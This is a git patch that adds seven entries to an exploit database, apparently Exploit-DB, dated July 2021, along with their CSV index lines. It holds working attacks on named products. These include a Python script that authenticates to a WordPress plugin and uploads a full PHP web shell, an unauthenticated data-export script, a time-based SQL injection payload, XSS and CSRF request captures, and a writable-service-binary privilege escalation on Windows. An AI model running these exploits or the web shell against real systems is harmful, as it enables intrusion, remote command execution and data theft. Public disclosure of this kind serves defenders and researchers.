From 5bd61e68a2aec6442f1e9bdd364ec9e126b6980b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 3 Jul 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-07-03 7 changes to exploits/shellcodes WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) --- exploits/hardware/webapps/50080.txt | 67 +++++++++++++++ exploits/multiple/webapps/50079.txt | 39 +++++++++ exploits/php/webapps/50081.txt | 88 ++++++++++++++++++++ exploits/php/webapps/50082.py | 122 ++++++++++++++++++++++++++++ exploits/php/webapps/50084.py | 69 ++++++++++++++++ exploits/php/webapps/50085.txt | 48 +++++++++++ exploits/windows/local/50083.txt | 90 ++++++++++++++++++++ files_exploits.csv | 7 ++ 8 files changed, 530 insertions(+) create mode 100644 exploits/hardware/webapps/50080.txt create mode 100644 exploits/multiple/webapps/50079.txt create mode 100644 exploits/php/webapps/50081.txt create mode 100755 exploits/php/webapps/50082.py create mode 100755 exploits/php/webapps/50084.py create mode 100644 exploits/php/webapps/50085.txt create mode 100644 exploits/windows/local/50083.txt diff --git a/exploits/hardware/webapps/50080.txt b/exploits/hardware/webapps/50080.txt new file mode 100644 index 000000000..ae03e8b3a --- /dev/null +++ b/exploits/hardware/webapps/50080.txt @@ -0,0 +1,67 @@ +# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) +# Date: 07-01-2021 +# Exploit Author: Tyler Butler +# Vendor Homepage: https://www.akcp.com/ +# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/ +# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956 +# Version: < SP480-20210624 +# CVE: CVE-2021-35956 + +# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. + + +1) Stored Cross-Site Scripting via System Settings + +POST /system?time=32e004c941f912 HTTP/1.1 +Host: [target] +Content-Length: 114 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://[target] +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://[target]/system?time=32e004c941f912 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +_SA01=System+Namer&_SA02=RDC&_SA03=Name&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save + +2) Stored Cross-Site Scripting via Email Settings + +POST /mail?time=32e004c941f912 HTTP/1.1 +Host: [target] +Content-Length: 162 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://[target] +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://[target]/mail?time=32e004c941f912 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + + +_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=&_PS05_4=&sbt2=Save + +3) Stored Cross-Site Scripting via Sensor Description + +POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 +Host: [target] +Content-Length: 55 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://[target] +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://[target]/senswatr?index=0&time=32e004c941f912 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: CPCookie=sensors=400 +Connection: close + +_WT00-IX=">&_WT03-IX=2&sbt1=Save \ No newline at end of file diff --git a/exploits/multiple/webapps/50079.txt b/exploits/multiple/webapps/50079.txt new file mode 100644 index 000000000..69a397d47 --- /dev/null +++ b/exploits/multiple/webapps/50079.txt @@ -0,0 +1,39 @@ +# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) +# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning) +# Date: 2021-06-18 +# Exploit Author: Stig Magnus Baugstø +# Vendor Homepage: https://scratch.mit.edu/ +# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe +# Version: 3.10.2 +# Tested on: Windows 10 x64, but should be platform independent. +# CVE: CVE-2020-7750 + +Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008 + +CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/ + +You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example: + + + + + +The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way. + +Example of regular cross-site scripting (XSS): + + + + + +The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE): + + + + + +The example above launches cmd.exe (Command Prompt) on Windows. + +For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/ + +Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums. \ No newline at end of file diff --git a/exploits/php/webapps/50081.txt b/exploits/php/webapps/50081.txt new file mode 100644 index 000000000..221e28d86 --- /dev/null +++ b/exploits/php/webapps/50081.txt @@ -0,0 +1,88 @@ +# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) +# Exploit Author: Alperen Ergel (@alpernae) +# Vendor Homepage: https://b2evolution.net/ +# Software Link: https://b2evolution.net/downloads/7-2-2 +# Version : 7.2.2 +# Tested on: Kali Linux +# Category: WebApp + +######## Description ######## + +Allows to attacker change admin account details. + +######## Proof of Concept ######## + +===> REQUEST <==== + +POST /b2evolution/evoadm.php HTTP/1.1 +Host: s2.demo.opensourcecms.com +Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; +__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK- +zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; +_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 1031 +Origin: https://s2.demo.opensourcecms.com +Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile +Upgrade-Insecure-Requests: 1 +Te: trailers +Connection: close + +## < SNIPP > + +edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID= +&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D= +&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7= +http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1 + + + + +#### Proof-Of-Concept #### + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50082.py b/exploits/php/webapps/50082.py new file mode 100755 index 000000000..df8beabbe --- /dev/null +++ b/exploits/php/webapps/50082.py @@ -0,0 +1,122 @@ +# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) +# Date 01.07.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip +# Version: Before 5.16.5 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24145 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md + +''' +Description: +Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, +did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' +content-type in the request. +''' + + +''' +Banner: +''' +banner = """ + ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ + / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___| +| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ +| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | + \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/ + + * Wordpress Plugin Modern Events Calendar Lite RCE + * @Hacker5preme + + +""" +print(banner) + +''' +Import required modules: +''' +import requests +import argparse + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +print('') +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print('[+] Authentication successfull !') +else: + print('[-] Authentication failed !') + exit() + + +''' +Exploit: +''' +exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import" + +# Exploit Header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589", + "Origin": "http://" + target_ip, + "Connection": "close", + "Upgrade-Insecure-Requests": "1" +} + +# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell +body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n 
\n                
\n        ___                         ____      _          _ _        _  _   \n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  \n|_|                         |___/  \\____/                                  \n                
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n" + +# Exploit +session.post(exploit_url, headers=header, data=body) +print('') +print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50084.py b/exploits/php/webapps/50084.py new file mode 100755 index 000000000..2732a6cf8 --- /dev/null +++ b/exploits/php/webapps/50084.py @@ -0,0 +1,69 @@ +# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) +# Date 01.07.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip +# Version: Before 5.16.5 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24146 +# CWE: CWE-863, CWE-284 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md + +''' +Description: +Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, +versions before 5.16.5, did not properly restrict access to the export files, +allowing unauthenticated users to exports all events data in CSV or XML format for example. +''' + + +''' +Banner: +''' +banner = """ + _______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____ + / ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/ + / / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \ +/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ / +\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/ + + * WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated) + * @Hacker5preme + +""" +print(banner) + + +''' +Import required modules: +''' +import requests +import argparse +import csv + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + + +''' +Exploit: +''' +print('') +print('[+] Exported Data: ') +print('') +exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv' +answer = requests.get(exploit_url) +decoded_content = answer.content.decode('utf-8') +cr = csv.reader(decoded_content.splitlines(), delimiter=',') +my_list = list(cr) +for row in my_list: + print(row) \ No newline at end of file diff --git a/exploits/php/webapps/50085.txt b/exploits/php/webapps/50085.txt new file mode 100644 index 000000000..00d7dcc90 --- /dev/null +++ b/exploits/php/webapps/50085.txt @@ -0,0 +1,48 @@ +# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) +# Exploit Author: ircashem +# Date 02.07.2021 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html +# Version 1.0 +# Tested on: Ubuntu 20.04 + +#################### +# Proof of Concept # +#################### + +POST /login.php HTTP/1.1 +Content-Length: 456 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 +Origin: http://localhost +DNT: 1 +Referer: http://localhost/ +Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im +Upgrade-Insecure-Requests: 1 +Sec-GPC: 1 +Connection: close + +-----------------------------238993435340593308934076060075 +Content-Disposition: form-data; name="username" + +admin +-----------------------------238993435340593308934076060075 +Content-Disposition: form-data; name="password" + +admin' AND (SELECT 1 from (select sleep(5))a) -- - +-----------------------------238993435340593308934076060075 +Content-Disposition: form-data; name="submit" + + +-----------------------------238993435340593308934076060075-- + +########### +# Payload # +########### + +username=admin +password=admin' AND (SELECT 1 from (select sleep(5))a) -- - \ No newline at end of file diff --git a/exploits/windows/local/50083.txt b/exploits/windows/local/50083.txt new file mode 100644 index 000000000..ffce49ae1 --- /dev/null +++ b/exploits/windows/local/50083.txt @@ -0,0 +1,90 @@ +# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control +# Date: 2021-07-01 +# Author: Andrea Intilangelo +# Vendor Homepage: http://nica.it - http://winwastenet.com +# Version: 1.0.6183.16475 +# Tested on: Windows 10 Pro x64 - 20H2 and 21H1 + +WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges. + +(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" + +(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software. + +(3) Details: + +C:\Users\user>sc qc winwasteservice +[SC] QueryServiceConfig OPERAZIONI RIUSCITE + +NOME_SERVIZIO: winwasteservice + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 1 NORMAL + NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" + GRUPPO_ORDINE_CARICAMENTO : + TAG : 0 + NOME_VISUALIZZATO : WinwasteService + DIPENDENZE : + SERVICE_START_NAME : LocalSystem + + +C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" +C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) + +Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file + +C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" +C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R + +C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG" +C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) + +Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file + + +C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\" +C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C + NT SERVICE\TrustedInstaller:(ID)F + NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F + NT AUTHORITY\SYSTEM:(ID)F + NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Administrators:(OI)(CI)(IO)(ID)F + BUILTIN\Users:(ID)R + BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:) + GENERIC_READ + GENERIC_EXECUTE + + CREATOR OWNER:(OI)(CI)(IO)(ID)F + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) + GENERIC_READ + GENERIC_EXECUTE + + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) + GENERIC_READ + GENERIC_EXECUTE \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a750390d9..c5d17ce4b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows, 50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows, +50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port 50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php, 50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php, 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple, +50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple, +50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware, +50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php, +50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php, +50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php, +50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,